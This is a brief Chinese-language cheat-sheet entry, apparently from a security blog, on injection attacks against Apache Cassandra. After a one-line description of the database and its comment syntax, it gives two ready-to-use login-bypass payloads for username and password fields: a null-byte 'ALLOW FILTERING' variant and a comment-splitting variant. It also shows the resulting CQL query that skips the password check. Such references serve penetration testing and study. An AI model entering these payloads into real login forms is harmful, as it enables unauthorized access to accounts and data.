Cassandra注入 1 year ago red.ghostwolflab.com 1 minute Apache Cassandra 是一个免费开源的分布式宽列存储 NoSQL 数据库管理系统。 Comment /* Cassandra Comment */ 登录绕过 1. username: admin' ALLOW FILTERING; %00 password: ANY 2. username: admin'/* password: */and pass>' 注入 SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;